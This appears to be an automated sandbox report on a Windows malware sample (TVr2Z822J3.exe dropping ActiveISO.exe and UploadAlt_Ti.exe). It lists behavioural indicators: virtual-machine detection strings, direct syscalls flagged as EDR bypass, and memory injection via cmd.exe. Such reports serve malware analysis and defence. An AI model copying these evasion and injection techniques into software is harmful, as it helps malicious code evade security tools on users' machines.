Source: TVr2Z822J3.exe, 00000006.00000002.1364214147.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y2s[
Source: UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: UploadAlt_Ti.exe, 0000000F.00000003.1784459699.0000000000585000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1361828373.00007FFB0C440000.00000008.00000001.01000000.00000008.sdmp, ActiveISO.exe, 0000000A.00000002.1430119058.00007FFB0A3C0000.00000008.00000001.01000000.00000014.sdmp	Binary or memory string: .?AVQEmulationPaintEngine@@

Source: C:\Users\user\ActiveISO.exe

Process information queried: ProcessInformation

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\ActiveISO.exe

Code function: 8_2_00007FF65376AE50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_00007FF65376AE50

Source: C:\Users\user\Desktop\TVr2Z822J3.exe

Code function: 6_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,

6_2_00406D5D

Source: C:\Users\user\ActiveISO.exe

Code function: 8_2_00007FF653739750 Sleep,??4QString@@QEAAAEAV0@PEBD@Z,StarBurn_Destroy,StarBurn_Destroy,StarBurn_UDF2_VolumeDestroy,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,Sleep,memset,?text@QLineEdit@@QEBA?AVQString@@XZ,?toLocal8Bit@QString@@QEHAA?AVQByteArray@@XZ,??1QString@@QEAA@XZ,??BQByteRef@@QEBADXZ,StarBurn_ISO9660JolietFileTree_BuildImage,?fromLocal8Bit@QString@@SA?AV1@PEBDH@Z,??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z,??1QString@@QEAA@XZ,memset,?toWCharArray@QString@@QEBAHPEA_W@Z,CreateFileW,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??4QString@@QEAAAEAV0@AEBV0@@Z,??1QString@@QEAA@XZ,GetProcessHeap,HeapAlloc,??4QString@@QEAAAEAV0@PEBD@Z,CloseHandle,GetProcessHeap,HeapFree,StarBurn_Destroy,StarBurn_Destroy,StarBurn_UDF2_VolumeDestroy,WriteFile,CloseHandle,GetProcessHeap,HeapFree,StarBurn_Destroy,StarBurn_Destroy,StarBurn_UDF2_VolumeDestroy,??1QByteArray@@QEAA@XZ,??4QString@@QEAAAEAV0@PEBD@Z,CloseHandle,GetProcessHeap,HeapFree,StarBurn_Destroy,StarBurn_Destroy,StarBurn_UDF2_VolumeDestroy,??4QString@@QEAAAEAV0@PEBD@Z,CloseHandle,GetProcessHeap,HeapFree,StarBurn_Destroy,StarBurn_Destroy,StarBurn_UDF2_VolumeDestroy,CloseHandle,GetProcessHeap,HeapFree,StarBurn_Destroy,StarBurn_Destroy,StarBurn_UDF2_VolumeDestroy,

8_2_00007FF653739750

Source: C:\Users\user\ActiveISO.exe	Code function: 8_2_00007FF65376A6C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF65376A6C0
Source: C:\Users\user\ActiveISO.exe	Code function: 8_2_00007FF65376B038 SetUnhandledExceptionFilter,	8_2_00007FF65376B038
Source: C:\Users\user\ActiveISO.exe	Code function: 8_2_00007FF65376AE50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF65376AE50
Source: C:\Users\user\ActiveISO.exe	Code function: 8_2_00007FFB0BCC3714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FFB0BCC3714
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Code function: 10_2_00007FF6B201A6C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FF6B201A6C0
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Code function: 10_2_00007FF6B201B038 SetUnhandledExceptionFilter,	10_2_00007FF6B201B038
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Code function: 10_2_00007FF6B201AE50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FF6B201AE50
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Code function: 10_2_00007FFB09D58C6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFB09D58C6C

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF7880C030D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtDeviceIoControlFile: Direct from: 0x7FF787F8E8FA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryValueKey: Direct from: 0x14011D93E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF7880C4190	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtProtectVirtualMemory: Direct from: 0x7FFB0AB094F5	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtCreateFile: Direct from: 0x23BF4762D58	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryInformationToken: Direct from: 0x7FF787F29BCE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtOpenFile: Direct from: 0x7FF678143D62	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryValueKey: Direct from: 0x7FF787F57548	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF78805D0BC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF7880CDC66	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x7FFB0BE89635	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x2855E5B9BD0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x7FFB0AB08E14	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF787F2D3F7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF78800B4C6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtReadFile: Direct from: 0x7FF787F24C4C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF78806490B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF78805F8E2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0xA0A76ACB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF787FCBB21	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF677FD2D17	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtClose: Direct from: 0x2
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtProtectVirtualMemory: Direct from: 0x3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF787F24A97	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF787F2D51E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x14011D808	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryValueKey: Direct from: 0x7FF787F572F3	Jump to behavior
Source: C:\Users\user\ActiveISO.exe	NtQuerySystemInformation: Direct from: 0x64B6CFDD90	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtClose: Direct from: 0x23BF2C98090
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtQuerySystemInformation: Direct from: 0x28500000000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtSetInformationProcess: Direct from: 0x7FF787F355CC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtCreateNamedPipeFile: Direct from: 0x2B7CD454DC1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF678008C4A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryInformationProcess: Direct from: 0x7FF787F33FCB	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtQuerySystemInformation: Direct from: 0x7FFB40CB21D3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtClose: Direct from: 0x2855E608250
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF787F271B9	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x23BF2C4BAE0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryInformationToken: Direct from: 0x7FF787F52D17	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF677FAD3F7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x7FFB0BE88E14	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF787F8C708	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtProtectVirtualMemory: Direct from: 0x7FFB0BE894F5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryValueKey: Direct from: 0x7FF787F56B22	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FFB2CE826A1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtClose: Direct from: 0x7FF787F34A76
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryValueKey: Direct from: 0x7FF787F570D8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF67814030D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF787FC3EAF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF78805D7D5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF7880C2CFC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateThreadEx: Direct from: 0x7FF787E741B3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF787F8FF21	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtClose: Direct from: 0x7FF7880C53F7
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtOpenKeyEx: Direct from: 0x7FF787F1CB47	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtClose: Direct from: 0x7FF7880C5405
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF787E77F9B	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtProtectVirtualMemory: Direct from: 0x7FFB0D5E94F5	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtClose: Direct from: 0x2B7CBA9EF70
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtRequestWaitReplyPort: Direct from: 0x7FF787FC3C48	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF787FBDB3C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF787FC3A8B	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x2B7CBA4F950	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF7880C3D62	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF7880CDB8E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF787F144E7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtQuerySystemInformation: Direct from: 0x2B700000000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryInformationProcess: Direct from: 0x7FF787F3463B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF787F20560	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF7880C6F1F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF787F20161	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtCreateFile: Direct from: 0x285600B5D58	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF7880603DD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtOpenFile: Direct from: 0x7FF677F944E7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x7FFB0D5E8E14	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF787F327CD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF78805C262	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtCreateNamedPipeFile: Direct from: 0x23BF4764DC1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FFB2CEA4B5E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtCreateNamedPipeFile: Direct from: 0x285600B7DC1	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x7FFB0D5E9635	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x7FFB0AB09635	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtReadFile: Direct from: 0x14011D832	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtClose: Direct from: 0x7FF7880C53E3
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtSetInformationProcess: Direct from: 0x7FF787F33EED	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF7880CBB2F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtQuerySystemInformation: Direct from: 0x23B00000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtCreateFile: Direct from: 0x2B7CD452D58	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x14011D7A4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtReadVirtualMemory: Direct from: 0x7FF7880C00F3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF787E73F92	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF787F8B53C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	NtProtectVirtualMemory: Direct from: 0x6C006C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF678142CFC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x140120A3C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF67800C708	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryInformationToken: Direct from: 0x7FF787F88C4A	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe base: 14011BC08	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe base: 398010	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe base: 14011BC08	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe base: 313010	Jump to behavior

Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Process created: C:\Users\user\ActiveISO.exe "C:\Users\user\ActiveISO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe	Jump to behavior

Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd

Source: C:\Users\user\Desktop\TVr2Z822J3.exe

Code function: 6_2_0040D72E cpuid

6_2_0040D72E

Source: C:\Users\user\Desktop\TVr2Z822J3.exe	Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,		6_2_00401F9D
Source: C:\Users\user\ActiveISO.exe	Code function: ___lc_locale_name_func,GetLocaleInfoEx,		8_2_00007FFB0BC9F610

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\TVr2Z822J3.exe

Code function: 6_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,

6_2_00401626

Source: C:\Users\user\ActiveISO.exe

Code function: 8_2_00007FF653738C60 StarBurn_Destroy,StarBurn_UDF2_VolumeDestroy,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,StarBurn_UDF2_DirectoryRootCreate,??4QString@@QEAAAEAV0@PEBD@Z,?isChecked@QGroupBox@@QEBA_NXZ,?text@QLineEdit@@QEBA?AVQString@@XZ,??1QString@@QEAA@XZ,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,?text@QLineEdit@@QEBA?AVQString@@XZ,??0QByteArray@@QEAA@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?lastIndexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,?remove@QString@@QEAAAEAV1@HH@Z,??1QString@@QEAA@XZ,?toLocal8Bit@QString@@QEHAA?AVQByteArray@@XZ,??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z,??1QByteArray@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?toLocal8Bit@QString@@QEHAA?AVQByteArray@@XZ,??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z,??1QByteArray@@QEAA@XZ,?data@QByteArray@@QEAAPEADXZ,?data@QByteArray@@QEAAPEADXZ,StarBurn_UDF2_FileBootCreate,??4QString@@QEAAAEAV0@PEBD@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??1QByteArray@@QEAA@XZ,??1QByteArray@@QEAA@XZ,?childCount@QTreeWidgetItem@@QEBAHXZ,?child@QTreeWidgetItem@@QEBAPEAV1@H@Z,?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z,?child@QTreeWidgetItem@@QEBAPEAV1@H@Z,?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??0QByteArray@@QEAA@AEBV0@@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??4QString@@QEAAAEAV0@AEBV0@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?child@QTreeWidgetItem@@QEBAPEAV1@H@Z,?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z,??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?child@QTreeWidgetItem@@QEBAPEAV1@H@Z,?text@QTreeWidgetItem@@QEBA?AVQString@@H@Z,?toLong@QString@@QEBAJPEA_NH@Z,??1QString@@QEAA@XZ,?utf16@QString@@QEBAPEBGXZ,StarBurn_UDF2_Director

8_2_00007FF653738C60

Source: C:\Users\user\Desktop\TVr2Z822J3.exe

